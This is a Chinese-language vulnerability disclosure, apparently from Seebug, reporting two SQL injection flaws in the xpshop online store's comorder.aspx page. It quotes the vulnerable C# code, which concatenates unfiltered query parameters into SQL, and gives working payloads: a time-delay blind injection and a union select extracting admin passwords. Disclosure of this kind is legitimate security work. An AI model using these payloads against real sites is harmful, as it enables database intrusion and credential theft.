xpshop网店系统sql注入两处（一处盲注）

### 简要描述： ### 详细说明： 漏洞位置：**.**.**.**order ``` protected void Page_Load(object sender, EventArgs e) { if (base.CurrentUser != null && base.CurrentUser.Name != "anonymous") { this.member = base.CurrentUser; this.shipfree = new ShippingFreeDB().GetShippingFreeDetails(1); if (!base.IsPostBack) { if (base.Request.QueryString["type"] != null && base.Request.QueryString["Action"] != null) { string text = base.Request.QueryString["Action"]; if (text != null) { if (!(text == "GetSubArea")) { if (!(text == "GetAddrDetail")) { if (!(text == "GetZtds")) { if (!(text == "GetShipps")) { if (!(text == "GetShoppingCart")) { if (text == "GetAdvancePayment") { if (base.CurrentUser != null && base.CurrentUser.Name != "anonymous") { base.Response.Write(base.CurrentUser.AdvancePayment); } else { base.Response.Write("0"); } } } else { ShoppingCartDB shoppingCartDB = new ShoppingCartDB(); SqlDataReader items = shoppingCartDB.GetItems(shoppingCartDB.GetShoppingCartId()); string s = XpShopJson.DrtToJSON(items, "Cart"); items.Close(); base.Response.Write(s); } } else { this.GetShipps(); } } else { this.GetZtds(); } } ``` 还是这个函数this.GetZtds();： ``` private void GetZtds() { SqlDataReader ztds = new ZtdDB().GetZtds2(base.Request.QueryString["AreaID"]); string s = XpShopJson.DrtToJSON(ztds, "Ztd"); base.Response.Write(s); } ``` 再跟进： ``` public SqlDataReader GetZtds2(string areaID) { string cmdText = string.Concat(new string[] { "SELECT * FROM Ztd WHERE ", Utils.dbo, "f_GetShippingAreaNo(AreaID) Like (Cast(", Utils.dbo, "f_GetShippingAreaNo(", areaID, ") As nvarchar(30)) + '%') ORDER BY ZtdID" }); return XpShopDB.ExecuteReader(XpShopDB.ConnectionString, CommandType.Text, cmdText, null); } ``` 好像不回显的。 没有过滤，直接进库给个payload： /comorder.aspx?type=1&action=GetZtds&AreaID=1) as nvarchar));waitfor delay '0:0:3'-- 第二处： ``` public int GetScore() { return (this.config.MarkUnit == 1) ? ((int)this.orderDB.GetComTotal(base.CurrentUser.MemberID, this.GetOrderIDs(), "Score")) : 0; } ``` 跟进函数GetComTotal： ``` public DataTable GetComOrderPresents(int memberID, string orderIDs, string productID) { string text = "select ProductID,GiftID,PresentName,sum(PresentNum)/count(GiftID) as PresentNum,Ptype,count(GiftID) as Sum from OrderPresent "; object obj = text; text = string.Concat(new object[] { obj, " where ", (productID != "0") ? ("ProductID = " + productID + " and ") : "", " OrderID In (select OrderID from Orders where (Orders.Status = 0 or Orders.Status = 2 and PayType IN(5,6)) and MemberID = ", memberID, " and OrderID in (", orderIDs, ")) " }); text += "group by ProductID,GiftID,PresentName,Ptype"; return XpShopDB.ExecuteDataTable(XpShopDB.ConnectionString, CommandType.Text, text, null); } ``` 同样没过滤。 给个payload： /comorder.aspx?OrderID=1)) union select password from admin-- ### 漏洞证明： http://localhost/comorder.aspx?type=1&action=GetZtds&AreaID=1) as nvarchar));waitfor delay '0:0:3'-- [<img src="https://images.seebug.org/upload/201510/15140550448c162d09f937582e724d762fa3b96c.jpg" alt="blind.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/15140550448c162d09f937582e724d762fa3b96c.jpg) 第二处： http://localhost/comorder.aspx?OrderID=1)) union select password from admin-- [<img src="https://images.seebug.org/upload/201510/15140606e7e0be443dceaee8504d2334a05a163a.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/15140606e7e0be443dceaee8504d2334a05a163a.jpg)